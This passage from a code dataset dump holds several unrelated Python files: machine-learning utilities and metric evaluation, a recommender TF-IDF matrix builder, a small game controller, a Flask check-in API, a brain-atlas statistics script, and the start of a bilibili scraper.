macro_f1, weighted_f1, loss):\n\n\tresult_folder = db_home + 'Classification/' + 'Result/' + db + '/' + str(train_id) + '/'\n\tif os.path.isdir(result_folder) == False:\n\t\tos.mkdir(result_folder)\n\n\tfile_loss = open(result_folder + 'microf1_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(f1) + \"\\n\")\n\tfile_loss.close()\n\n\tfile_loss = open(result_folder + 'war_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(war) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'uar_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(uar) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'macrof1_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(macro_f1) + 
\"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'weightedf1_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(weighted_f1) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(result_folder + 'losses_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(loss) + \"\\n\")\n\tfile_loss.close()\t\n\ndef sanity_check_image(X, channel, spatial_size):\n\t# item = X[0,:,:,:]\n\titem = X[0, :, :, 0]\n\n\titem = item.reshape(224, 224, channel)\n\n\tcv2.imwrite('sanity_check.png', item)\n\n\n\ndef class_merging(table):\n\tneg = ['repression', 'disgust', 'anger', 'contempt', 'fear', 'sadness']\n\tpos = ['happiness']\n\tother = ['other', 'others']\n\trows_to_remove = []\n\ttable = table[0]\n\n\tfor counter in range(len(table)):\n\t\titem = table[counter]\n\t\titem[-1] = item[-1].lower()\n\t\tif item[-1] in neg:\n\t\t\ttable[counter, -1] = 1\n\t\telif item[-1] in pos:\n\t\t\ttable[counter, -1] = 2\n\t\telif item[-1] == 'surprise':\n\t\t\ttable[counter, -1] = 3\n\t\telif item[-1] in other:\n\t\t\trows_to_remove += [counter]\n\n\ttable = np.delete(table, rows_to_remove, 0)\n\t# print(table)\n\n\treturn table\n\ndef class_discretization(table, db='CASME_2'):\n\t# neg = ['repression', 'disgust', 'anger', 'contempt', 'fear', 'sadness']\n\t# pos = ['happiness']\n\t# other = ['other', 'others']\n\trows_to_remove = []\n\ttable = table[0]\n\n\tif 'CASME' in db:\n\t\tfor counter in range(len(table)):\n\t\t\titem = table[counter]\n\t\t\titem[-1] = item[-1].lower()\n\t\t\tif item[-1] == 'happiness':\n\t\t\t\ttable[counter, -1] = 1\n\t\t\telif item[-1] == 'disgust':\n\t\t\t\ttable[counter, -1] = 2\n\t\t\telif item[-1] == 'repression':\n\t\t\t\ttable[counter, -1] = 3\n\t\t\telif item[-1] == 'surprise':\n\t\t\t\ttable[counter, -1] = 4\n\t\t\telif item[-1] == 'others':\n\t\t\t\ttable[counter, -1] = 5\n\t\t\telif item[-1] == 'fear' or item[-1] == 'sadness':\n\t\t\t\trows_to_remove += [counter]\t\t\n\t\ttable = np.delete(table, rows_to_remove, 0)\t\n\n\telif 'SAMM' in db:\n\t\tfor counter in range(len(table)):\n\t\t\titem = table[counter]\n\t\t\titem[-1] = item[-1].lower()\n\t\t\tif item[-1] == 'anger':\n\t\t\t\ttable[counter, -1] = 1\n\t\t\telif item[-1] == 'happiness':\n\t\t\t\ttable[counter, -1] = 2\n\t\t\telif item[-1] == 'contempt':\n\t\t\t\ttable[counter, -1] = 3\t\n\t\t\telif item[-1] == 'surprise':\n\t\t\t\ttable[counter, -1] = 4\t\n\t\t\telif item[-1] == 'other':\n\t\t\t\ttable[counter, -1] = 5\n\t\t\telif item[-1] == 'sadness' or item[-1] == 'fear' or item[-1] == 'disgust':\n\t\t\t\trows_to_remove += [counter]\n\t\ttable = np.delete(table, rows_to_remove, 0)\t\n\n\t# table = np.delete(table, rows_to_remove, 0)\n\t# print(table)\n\n\treturn table\n\ndef reverse_discretization(label, db='CASME'):\n\tif 'CASME' in db:\n\t\tif label == 0:\n\t\t\tlabel = 'happiness'\n\t\telif label == 1:\n\t\t\tlabel = 'disgust'\n\t\telif label == 2:\n\t\t\tlabel = 'repression'\n\t\telif label == 3:\n\t\t\tlabel = 'surprise'\n\t\telif label == 4:\n\t\t\tlabel = 'others'\t\t\t\t\t\t\t\t\t\n\n\treturn label\n\ndef load_combined_labels(path):\n\tpath = path + 'combined_3dbs.csv'\n\ttable = pd.read_table(path, sep=',', header=None, names=['db', 'sub', 'vid', 'class'])\n\t\n\n\ttable = table.values\n\n\tpivoting = [0]\n\tcurr_db = table[0][0]\n\tfor counter in range(len(table)):\n\t\tdb = table[counter][0]\n\t\tif db != curr_db:\n\t\t\tpivoting += [counter]\n\t\t\tcurr_db = db\n\t# print(len(table))\n\n\ttable = np.delete(table, 0, axis=1)\n\t### HARD SEQUENCE: CASME --> SMIC --> SAMM\n\tcasme_table = 
table[pivoting[0]:pivoting[1], :]\n\tsmic_table = table[pivoting[1]:pivoting[2], :]\n\tsamm_table = table[pivoting[2]:, :]\n\n\n\treturn casme_table, samm_table, smic_table\n\n\ndef compute_distribution(X):\n\n\t# initialize under-sampler\n\t# to be done\n\n\t# vectorize X array\n\tX = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[2] * X.shape[3]))\n\n\t# normalize the distribution to range of [0, 1]\n\tX = ( (X - np.amin(X)) / (np.amax(X) - np.amin(X)) )\n\tprint(X)\n\tprint(X.shape)\n\n\t# # channel by channel pca\n\t# X_B = X\n\t# X_G\n\t# X_R\n\n\tnumber_of_samples_X = X.shape[0]\n\tpca = PCA(n_components=2)\n\trand_X_test = pca.fit_transform(X)\n\tprint(rand_X_test)\n\tprint(rand_X_test.shape)\n\tpca_X = []\n\tfor item in X:\n\t\titem = item.reshape((1, -1))\n\t\titem = pca.fit_transform(item)\n\t\tpca_X += [item]\n\tX = np.vstack(pca_X)\n\tprint(X.shape)\n\n\tdistrib_X = tf.random.categorical(logits = X, num_samples=number_of_samples_X)\n\tprint(distrib_X)\n\tprint(distrib_X.shape)\n\n\treturn distrib_X\n\n\ndef compute_distribution_OS(X):\n\t# initialize PCA\n\t# 24 components\n\tpca_components = 24\n\tpca = PCA(n_components=pca_components)\n\n\t# since it's OS with only b & w strands, we can just take the first channel\n\tX = X[:, 0, :, :]\n\n\tpca_X = []\n\tpca_y = []\n\n\t# index and reshape\n\tx_dim = X[:, :, 0]\n\ty_dim = X[:, 0, :]\n\n\t# apply pca\n\tdim_reduce_X = pca.fit_transform(x_dim)\n\tdim_reduce_y = pca.fit_transform(y_dim)\n\n\t# normalization\n\tdim_reduce_X = ( (dim_reduce_X - np.amin(dim_reduce_X)) / (np.amax(dim_reduce_X) - np.amin(dim_reduce_X)) )\n\tdim_reduce_y = ( (dim_reduce_y - np.amin(dim_reduce_y)) / (np.amax(dim_reduce_y) - np.amin(dim_reduce_y)) )\n\n\n\t# # draw distribution for each normalized logits\n\t# distrib_X = tf.random.categorical(logits = dim_reduce_X, num_samples=dim_reduce_X.shape[1])\n\t# distrib_y = tf.random.categorical(logits = dim_reduce_y, num_samples=dim_reduce_y.shape[1])\n\n\tdistrib_X = dim_reduce_X\n\tdistrib_y = dim_reduce_y\n\n\treturn distrib_X, distrib_y\t","repo_name":"IcedDoggie/ME_Autoencoders","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":23861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71346051620","text":"from config import *\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix, cohen_kappa_score, roc_auc_score\nimport numpy as np\nfrom utils import *\n\ndef evaluate(Y_val_hat_pb, Y_val_hat, Y_val, Y_ts_hat_pb, Y_ts_hat, Y_ts, epoch, loss, log_file=None, cv_i=None):\n ''' calculate several metrics and store in cache_pf\n cache_pf: performance metrics will be stored '''\n labels = np.unique(Y_ts)\n f1_vl = round(f1_score(Y_val, Y_val_hat, labels=[0,1,2,3,4], average='macro', zero_division=1), 4)\n f1_ts = round(f1_score(Y_ts, Y_ts_hat, labels=[0,1,2,3,4], average='macro', zero_division=1), 4)\n f1_per_class = f1_score(Y_ts, Y_ts_hat, labels=[0,1,2,3,4], average=None)\n f1_per_class = {a: round(b, 4) for a, b in zip(labels, f1_per_class)}\n kappa = round(cohen_kappa_score(Y_ts, Y_ts_hat), 4)\n acc = round(accuracy_score(Y_ts, Y_ts_hat), 4)\n confusion = confusion_matrix(Y_ts, Y_ts_hat, labels=labels)\n confusion = {a: b for a, b in zip(labels, confusion)}\n ## For Lable Transition Task\n # roc_auc_val = round(roc_auc_score(Y_val, Y_val_hat_pb[:, 1]), 4)\n # roc_auc_ts = round(roc_auc_score(Y_ts, Y_ts_hat_pb[:, 1]), 4)\n # writelog(log_file, f'roc_auc_val: {roc_auc_val}, roc_auc_ts: 
{roc_auc_ts}')\n\n # For Record\n cache_pf_column = ([\"CV\", \"Epoch\", \" \", \"Valid_F1\", \"Test_F1\", \"Kappa\", \"ACC\", \" \",\n \"Batch\", \"lr\", \"Seq_Length\", \" \",\"Training_Loss\", \" \",\n \"F1_per_Class\", \"Confusion\"])\n cache_pf = [cv_i, epoch+1, \" \", f1_vl, f1_ts, kappa, acc, \" \",\n args.batch, args.lr, args.seq_length, \" \",loss, \" \",\n f1_per_class, confusion]\n\n return cache_pf_column, cache_pf, f1_vl, f1_ts\n\n# f1_per_class = {\"W\": \"{:0.4}\".format(f1_per_class[0]), \"N1\": \"{:0.4}\".format(f1_per_class[1]),\n# \"N2\": \"{:0.4}\".format(f1_per_class[2]),\n# \"N3\": \"{:0.4}\".format(f1_per_class[3]), \"REM\": \"{:0.4}\".format(f1_per_class[4])}\n","repo_name":"ku-milab/CE_SCST","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"73551029539","text":"from utils import *\n\ndef build_user_product_matrix(df_user_product_frequency, matrix_file_path, matrix_name):\n \"\"\"Build and store coo/csr sparse matrix of user-product matrix.\"\"\"\n assert isinstance(df_user_product_frequency, pd.DataFrame)\n assert isinstance(matrix_file_path, str) and isinstance(matrix_name, str)\n matrix_path = os.path.join(matrix_file_path, matrix_name)\n if os.path.exists(matrix_path):\n print_warning('User-product matrix is already existed.')\n return sparse.load_npz(matrix_path).tocsr()\n \n df_user_product_frequency['user_id'] = df_user_product_frequency['user_id'].astype('category')\n df_user_product_frequency['product_id'] = df_user_product_frequency['product_id'].astype('category')\n \n # Define sparse user-product matrix in coo format\n data = df_user_product_frequency['frequency']\n row = df_user_product_frequency['user_id'].cat.codes.copy()\n col = df_user_product_frequency['product_id'].cat.codes.copy()\n user_product_matrix = sparse.coo_matrix((data, (row, col)))\n \n # Store and return the sparse matrix\n if not os.path.exists(matrix_file_path):\n os.mkdir(matrix_file_path) \n sparse.save_npz(matrix_path, user_product_matrix)\n print_success('User-product matrix is stored at %s' % matrix_path)\n return user_product_matrix.tocsr()\n\n\ndef build_tfidf_matrix(tf, matrix_file_path, matrix_name):\n \"\"\"Build tf-idf sparse matrix for product. 
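The weights are sqrt(tf) * log(N / (1 + df)), where N is the number of users (rows) and df is the per-product document frequency.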
'tf' refers to term frequency.\"\"\"\n assert isinstance(tf, sparse.csr.csr_matrix)\n assert isinstance(matrix_file_path, str) and isinstance(matrix_name, str)\n matrix_path = os.path.join(matrix_file_path, matrix_name)\n if os.path.exists(matrix_path):\n print_warning('User-product TF-IDF matrix is already existed.')\n return sparse.load_npz(matrix_path).tocsr()\n\n tf_idf = coo_matrix(tf)\n \n # Get total number of documents (here is user number)\n N = tf.shape[0]\n \n # Calculate IDF (inverse document frequency)\n idf = np.log(N / (1 + np.bincount(tf_idf.col)))\n\n # Since terms don’t show up in many documents, we apply a square root penalty over tf to dampen it.\n tf_idf.data = np.sqrt(tf_idf.data) * idf[tf_idf.col] \n\n # Store and return the sparse matrix\n if not os.path.exists(matrix_file_path):\n os.mkdir(matrix_file_path) \n sparse.save_npz(matrix_path, tf_idf)\n print_success('User-product TF-IDF matrix is stored at %s' % matrix_path)\n return tf_idf.tocsr()\n\n\n# Constants\ndata_path = './data/extracted_dataset'\nstore_path = './data/train_test_data'\ntrain_matrix_path = './data/matrixes'\ntrain_matrix_name = 'user_product_train.npz'\ntrain_tfidf_matrix_name = 'user_product_tfidf_train.npz'\n\n# From processed training data\ndf_product_frequency, df_user_product_frequency, df_productsPerUser_train = get_training_data(data_path, store_path)\n\n# Generate sparse matrix for training\nuser_product_matrix_train = build_user_product_matrix(df_user_product_frequency, train_matrix_path, train_matrix_name)\n\n# Generate tf-idf matrix based on user-product-pair matrix\nuser_product_tfidf_matrix_train = build_tfidf_matrix(user_product_matrix_train, train_matrix_path, train_tfidf_matrix_name)\n","repo_name":"chaitanyaspatil/Instacart_Database_Insights","sub_path":"recommender/src/user_product_matrix.py","file_name":"user_product_matrix.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70791567782","text":"from model.game import Game\nfrom view.game_view import GameView\nfrom model.game_result import GameResult\n\nclass GameController:\n def __init__(self, model: Game, view: GameView) -> None:\n self.model = model\n self.view = view\n\n def run_game(self):\n self.view.display_board()\n\n game_ended = False\n \n while not game_ended:\n self.view.next_player(self.model.current_player)\n row, col = self.view.next_move()\n self.model.make_move(row, col)\n self.view.display_board()\n result = self.model.check_winner()\n if result != GameResult.NONE:\n self.view.display_winner(self.model.current_player, result == GameResult.DRAW)\n game_ended = True\n else:\n self.model.change_player()\n\n ","repo_name":"farhad-ibrahimzade/EECE2140","sub_path":"MVC_DEMO/controller/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12428438334","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 3 23:59:56 2021\n\n@author: maysa\n\"\"\"\n\nimport pandas as pd\n\ndf = pd.read_excel('tbCursos.xlsx')\ncodCurso = df['Curso'].tolist()\nnome = df['Descr'].tolist()\nsubTipo = df['SubTipo'].tolist()\n\nfor i in range(0,234):\n print(\"INSERT INTO Curso(codCurso, nome, codSubTipoCurso) VALUES ('\" + str(codCurso[i]) + \"', '\"+ nome[i] + \"', '\" + str(subTipo[i]) + \"');\")","repo_name":"tommygomez25/BD","sub_path":"Python 
scripts/Cursos.py","file_name":"Cursos.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41754105361","text":"# -*- coding:utf-8 -*-\nfrom flask import jsonify, request, current_app\nfrom ..models import Info, db\nfrom . import api\nimport os\n\n\n@api.route('/posts/upLoadProfile', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n data = request.get_json()\n name = data.get('name')\n sex = data.get('sex')\n job_title = data.get('job_title')\n work_location_name = data.get('work_location_name')\n taxation_num = data.get('taxation_num')\n\n name_test = Info.query.filter_by(name=name).first()\n if name_test is not None:\n return jsonify({'code': 0, 'message': '已经报到'})\n\n info = Info(\n name=name,\n sex=sex,\n job_title=job_title,\n work_location_name=work_location_name,\n taxation_num=taxation_num,\n check_in=True\n )\n\n try:\n db.session.add(info)\n db.session.commit()\n return jsonify({'code': 1, 'message': '报到成功'})\n except Exception as e:\n db.session.rollback()\n return jsonify({'code': -1, 'message': '报到失败'})\n","repo_name":"ShimakazePr/xggscheckin","sub_path":"app/api/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3642492138","text":"import os\nimport copy\nimport pickle\nimport argparse\nimport skimage.io\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import ttest_ind_from_stats\nimport img3\n\n \nclass Atlas:\n\n # Class variables shared by all instances\n files = {\n \"distance\" : \"/media/athena-admin/FastSSD1/Athena/atlas/ABA_25um_distance_to_surface.tif\",\n \"annotations\" : \"/media/athena-admin/FastSSD1/Athena/atlas/ABA_25um_annotation.tif\",\n \"table\" : \"atlas.tab\"\n }\n\n\n def pprint(self, s):\n print(\"(atlas) %s\" % s)\n\n\n def get_atlas(self, path):\n a = skimage.io.imread(path, plugin='tifffile').T\n return a\n\n\n def get_cropped_atlas(self, path, sample3D):\n \"\"\"\n Assumes that sample is cropped in the Z-direction\n \"\"\"\n a_ = self.get_atlas(path)\n a = np.zeros(np.shape(sample3D))\n a[:,:,:] = a_[:, :, 0:np.shape(sample3D)[2]]\n return a\n\n\n def map_fine_to_coarse_levels(self):\n\n fw = open(\"regions_level1.dat\", 'w')\n fw.write(\"%15s %15s %15s\\n\" % (\"Original ID\", \"Coarse-level ID\", \"Coarse-level name\"))\n\n for i in range(len(self.regions[\"fine_level\"])):\n\n p = copy.deepcopy(self.regions[\"parents\"][i])\n l = copy.deepcopy(self.regions[\"fine_level\"][i])\n\n self.regions[\"fine2coarse_level\"][i] = copy.deepcopy(l)\n self.regions[\"fine2coarse_names\"][i] = self.regions[\"fine_names\"][i]\n\n self.pprint(\"\\n\")\n self.pprint(\"New item:\")\n self.pprint(\"l: %d p: %d\" % (l, p))\n\n while (p != -1) and (p != 997):\n\n idx_ = np.where( self.regions[\"fine_level\"]==p )\n assert(len(idx_)==1)\n idx = idx_[0][0]\n\n p_new = copy.deepcopy( self.regions[\"parents\"][idx] )\n\n if p_new == 997:\n p = p_new\n else:\n l = copy.deepcopy(p)\n p = p_new\n\n self.pprint(\"l: %d p: %d\" % (l, p))\n\n idx_ = np.where( self.regions[\"fine_level\"] == l )\n assert(len(idx_)==1)\n idx = idx_[0][0]\n self.regions[\"fine2coarse_level\"][i] = copy.deepcopy(l)\n self.regions[\"fine2coarse_names\"][i] = copy.deepcopy(self.regions[\"fine_names\"][idx])\n\n\n self.pprint(\"finished while loop. 
grouped[i]=%d\" % self.regions[\"fine2coarse_level\"][i])\n\n fw.write(\"%15d %15d %s\\n\" % (self.regions[\"fine_level\"][i], self.regions[\"fine2coarse_level\"][i], self.regions[\"fine2coarse_names\"][i]))\n fw.close()\n\n\n # Instance variables unique to each instance\n # self.x\n def __init__(self, sample3D):\n \"\"\"\n Members:\n * self.files\n * self.regions -- dict\n * self.atlas_annotations -- cropped atlas with annotated region IDs\n * self.Nfine -- number of unique fine regions\n * self.Ncoarse -- number of unique coarse regions\n * self.pickle -- path to backup pickle file\n * self.pickle_maps - path to backup file for fine->coarse mapping\n \"\"\"\n\n self.pprint(\"Instantiating atlas...\")\n\n self.regions = {\n \"parents\" : [None],\n \"fine_level\" : [None],\n \"fine_volumes\" : [None],\n \"fine2coarse_level\" : [None],\n \"fine2coarse_names\" : [None],\n \"unique_coarse_level\" : [None], \n \"unique_coarse_vols\" : [None],\n \"unique_coarse_names\" : [None] \n }\n\n self.pickle = \"atlas_info.pickle\"\n self.pickle_maps = \"atlas_fine2coarse_map.pickle\"\n\n table = pd.read_csv(self.files[\"table\"], header=None, sep='\\t', lineterminator='\\n')\n\n self.Nfine = len( table.loc[:,0] )\n\n self.regions[\"parents\"] = copy.deepcopy(table.loc[:,1])\n self.regions[\"fine_level\"] = copy.deepcopy(table.loc[:,0])\n self.regions[\"fine_names\"] = copy.deepcopy(table.loc[:,3])\n self.regions[\"fine_volumes\"] = np.zeros( self.Nfine )\n self.regions[\"fine2coarse_level\"] = np.zeros( self.Nfine )\n self.regions[\"fine2coarse_names\"] = [None] * self.Nfine\n\n self.atlas_annotations = self.get_cropped_atlas(self.files[\"annotations\"], sample3D)\n\n # Compute volume of fine regions\n if os.path.exists(self.pickle):\n with open(self.pickle, 'rb') as handle:\n backup = pickle.load(handle)\n self.regions = copy.deepcopy(backup)\n self.pprint(\"Loaded pickle.\")\n\n else:\n self.pprint(\"Computing volume per region...\")\n\n for i,ID in enumerate(self.regions[\"fine_level\"]):\n idx = np.where(self.atlas_annotations==ID)\n self.regions[\"fine_volumes\"][i] = np.shape(idx)[1]\n\n with open(self.pickle, 'wb') as handle:\n pickle.dump(self.regions, handle, protocol=pickle.HIGHEST_PROTOCOL)\n self.pprint(\"Dumped pickle.\")\n\n\n # Find mapping of fine -> coarse regions\n if os.path.exists(self.pickle_maps):\n with open(self.pickle_maps, 'rb') as handle:\n backup = pickle.load(handle)\n self.regions[\"fine2coarse_level\"][:] = backup[\"fine2coarse_level\"][:]\n self.regions[\"fine2coarse_names\"][:] = backup[\"fine2coarse_names\"][:]\n self.pprint(\"Loaded pickle_maps.\")\n\n else:\n self.pprint(\"Computing fine-to-coarse region mapping...\")\n self.map_fine_to_coarse_levels()\n\n with open(self.pickle_maps, 'wb') as handle:\n pickle.dump(self.regions, handle, protocol=pickle.HIGHEST_PROTOCOL)\n self.pprint(\"Dumped pickle_maps.\")\n\n\n\n # First selection of coarse regions \n self.Ncoarse = len( np.unique(self.regions[\"fine2coarse_level\"]) )\n self.regions[\"unique_coarse_level\"] = np.unique(self.regions[\"fine2coarse_level\"])\n\n # Volume of coarse regions\n self.regions[\"unique_coarse_vols\"] = np.zeros( self.Ncoarse )\n self.regions[\"unique_coarse_names\"] = [None] * self.Ncoarse\n for i,ID in enumerate(self.regions['unique_coarse_level']):\n idx = np.where( self.regions[\"fine2coarse_level\"] == ID )\n self.regions[\"unique_coarse_vols\"][i] = np.sum( self.regions[\"fine_volumes\"][idx] )\n self.regions[\"unique_coarse_names\"][i] = 
self.regions[\"fine2coarse_names\"][idx[0][0]]\n\n\n # Ignore regions with 0 volume\n idx = self.regions[\"unique_coarse_vols\"]>0\n tmpv = self.regions[\"unique_coarse_vols\"][idx]\n tmpl = self.regions[\"unique_coarse_level\"][idx]\n self.Ncoarse = len(tmpv)\n self.regions[\"unique_coarse_vols\"] = np.zeros( self.Ncoarse )\n self.regions[\"unique_coarse_vols\"][:] = copy.deepcopy(tmpv[:])\n self.regions[\"unique_coarse_level\"] = np.zeros( self.Ncoarse )\n self.regions[\"unique_coarse_level\"][:] = copy.deepcopy(tmpl[:])\n\n tmpn = copy.deepcopy(self.regions[\"unique_coarse_names\"])\n self.regions[\"unique_coarse_names\"] = [None] * self.Ncoarse\n k = 0\n for i,ID in enumerate(idx):\n if ID == True:\n self.regions[\"unique_coarse_names\"][k] = tmpn[i]\n k = k+1\n\n self.pprint(\"Nfine=%d Ncoarse=%d\" % (self.Nfine, self.Ncoarse))\n\n\n\nclass Cohort:\n\n \"\"\"\n An instance would be a list of samples\n of the same group.\n\n self.files\n self.vol\n self.mean\n self.std\n self.densities\n \"\"\"\n\n def pprint(self, s):\n print(\"(cohort) %s\" % s)\n\n\n def __init__(self, files, atlas):\n\n Nfine = atlas.Nfine\n Ncoarse = atlas.Ncoarse\n Nsamples = len(files)\n\n self.files= [None] * Nsamples\n \"\"\"\n vol, mean, std are over the unique COARSE regions\n \"\"\"\n self.vol = np.zeros( (Ncoarse, Nsamples) )\n self.densities = np.zeros( (Ncoarse, Nsamples) )\n self.mean = np.zeros( Ncoarse )\n self.std = np.zeros( Ncoarse )\n\n for i in range(Nsamples):\n self.files[i] = files[i]\n\n\n # Loop over samples of a cohort\n\n # volume of cells in each fine region:\n # ***\n cell_volumes_fine = np.zeros( (Nfine, Nsamples) )\n\n\n for ii,cdir in enumerate(self.files):\n\n backup = \"%s/volume_per_coarse_region.dat\" % cdir\n if os.path.exists(backup):\n self.pprint(\"Loading cell volumes in coarse regions from file.\")\n tmp_ = np.loadtxt(backup, skiprows=1)\n self.vol[:, ii] = tmp_[:,1]\n\n else:\n self.pprint(\"Processing directory: %s\" % cdir)\n\n\n # Volume of cells in each fine region\n self.pprint(\"Computing vol. of cells per fine region...\")\n cells = img3.nrrd_data(\"%s/transformed_cells_eroded.nrrd\" % cdir)\n for i,ID in enumerate(atlas.regions[\"fine_level\"]):\n print(ii, i)\n idx = np.where(atlas.atlas_annotations==ID)\n cell_volumes_fine[i, ii] += np.sum( cells[idx] )\n\n\n # Volume of cells in each coarse region: merge fine into coarse\n self.pprint(\"Computing vol. 
of cells per coarse region...\")\n for i,ID in enumerate(atlas.regions[\"unique_coarse_level\"]):\n idx = np.where( atlas.regions[\"fine2coarse_level\"] == ID )\n self.vol[i, ii] += np.sum( cell_volumes_fine[idx, ii] )\n\n\n # Export total cell volume per corse region in file\n self.pprint(\"Exporting coarse region volumes.\")\n fw = open(\"%s/volume_per_coarse_region.dat\" % cdir, 'w')\n fw.write(\"%15s %15s\\n\" % (\"Coarse ID\", \"total cell vol.\"))\n for i,ID in enumerate(atlas.regions[\"unique_coarse_level\"]):\n fw.write(\"%d %g\\n\" % (ID, self.vol[i,ii]))\n fw.close()\n\n\n # Cell densities in coarse regions\n with np.errstate(divide='warn', invalid='warn'):\n d = self.vol[:,ii] / atlas.regions[\"unique_coarse_vols\"][:]\n d[np.isnan(d)] = -1\n self.densities[:,ii] = d[:]\n\n\n # Compute averages over samples\n self.mean[:] = np.mean(self.vol, axis=1)\n self.std[:] = np.std( self.vol, axis=1)\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-pd', type=str, nargs='+', required=True, help=\"aligned directory for Placebo \")\n parser.add_argument('-ld', type=str, nargs='+', required=True, help=\"aligned directory for LowDose \")\n parser.add_argument('-hd', type=str, nargs='+', required=True, help=\"aligned directory for HighDose\")\n args = parser.parse_args()\n\n # Read sample shape and instantiate atlas\n cells_ = skimage.io.imread(\"%s/voxelized_R15.tif\" % (args.pd[0]), plugin='tifffile').T\n atlas = Atlas(cells_)\n\n\n # Compute cohort-wise stats\n print(\"Instantiating cohorts...\")\n cohort_P = Cohort(args.pd, atlas)\n cohort_L = Cohort(args.ld, atlas)\n cohort_H = Cohort(args.hd, atlas)\n\n if 0:\n print(\"\\ncohort_P\")\n for i in range(atlas.Ncoarse):\n print(i, cohort_P.densities[i,:], cohort_P.vol[i,:])\n\n print(\"\\ncohort_L\")\n for i in range(atlas.Ncoarse):\n print(i, cohort_L.densities[i,:], cohort_L.vol[i,:])\n\n print(\"\\ncohort_H\")\n for i in range(atlas.Ncoarse):\n print(i, cohort_H.densities[i,:], cohort_H.vol[i,:])\n\n\n # Compute pvalues\n # two-sided t-test pvalue\n ttest_l = ttest_ind_from_stats(mean1=cohort_L.mean, std1=cohort_L.std, nobs1=3, mean2=cohort_P.mean, std2=cohort_P.std, nobs2=3)\n ttest_h = ttest_ind_from_stats(mean1=cohort_H.mean, std1=cohort_H.std, nobs1=3, mean2=cohort_P.mean, std2=cohort_P.std, nobs2=3)\n\n\n # Find non-nan pvalues\n condition = ((ttest_l.pvalue>0)*(ttest_l.pvalue<1)) == 1\n lstatistic = np.where( condition , ttest_l.statistic, 0)\n lpvalues = np.where( condition , ttest_l.pvalue, 0)\n\n condition = ((ttest_h.pvalue>0)*(ttest_h.pvalue<1)) == 1\n hstatistic = np.where( condition , ttest_h.statistic, 0)\n hpvalues = np.where( condition , ttest_h.pvalue, 0)\n\n\n # Split effect\n leffect = np.where(lstatistic>0, +lpvalues, 0)\n leffect = np.where(lstatistic<0, -lpvalues, leffect)\n heffect = np.where(hstatistic>0, +hpvalues, 0)\n heffect = np.where(hstatistic<0, -hpvalues, heffect)\n\n\n # Export CSV file\n\n fw = open(\"pvalues_L1_regions.csv\", 'w')\n\n fw.write(\"%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s\\n \" % (\"Region ID\", \"Region name\", \"Region volume\", \"dens P1\", \"dens P2\", \"dens P3\", \"vol P1\", \"vol P2\", \"vol P3\",\"avg_P\", \"dens LD1\", \"dens LD2\", \"dens LD3\", \"vol LD1\", \"vol LD2\", \"vol LD3\", \"avg_LD\", \"dens HD1\", \"dens HD2\", \"dens HD3\", \"vol HD1\", \"vol HD2\", \"vol HD3\", \"avg HD\", \"pv LD\", \"pv HD\") )\n\n for i in range(atlas.Ncoarse):\n fw.write(\"%g, %s, %g, 
%g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g\\n \" % (atlas.regions[\"unique_coarse_level\"][i], atlas.regions[\"unique_coarse_names\"][i].replace(',', ''), atlas.regions[\"unique_coarse_vols\"][i], cohort_P.densities[i,0], cohort_P.densities[i,1], cohort_P.densities[i,2], cohort_P.vol[i,0], cohort_P.vol[i,1], cohort_P.vol[i,2], cohort_P.mean[i], cohort_L.densities[i,0], cohort_L.densities[i,1], cohort_L.densities[i,2], cohort_L.vol[i,0], cohort_L.vol[i,1], cohort_L.vol[i,2], cohort_L.mean[i], cohort_H.densities[i,0], cohort_H.densities[i,1], cohort_H.densities[i,2], cohort_H.vol[i,0], cohort_H.vol[i,1], cohort_H.vol[i,2], cohort_H.mean[i], leffect[i], heffect[i] ) )\n\n fw.close()\n\n\n","repo_name":"aecon/3D-microglia-netoglitazone","sub_path":"post-processing/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":13860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24382782187","text":"# -*- coding: utf-8 -*-\n\nimport pymongo\nimport requests\nfrom bs4 import BeautifulSoup\n\nJanuary, April, july, October = 1, 2, 3, 4\nclient = pymongo.MongoClient('localhost', 27017)\nbilibili = client['bilibili']\nchannels = bilibili['channels']\n\nmonths = [0, 1, 4, 7, 10]\n\n\n# 获取从1970年1月至2017年1月的番剧索引页\ndef get_channel_urls():\n for year in range(1970, 2017):\n for month in range(1, 5):\n channel = 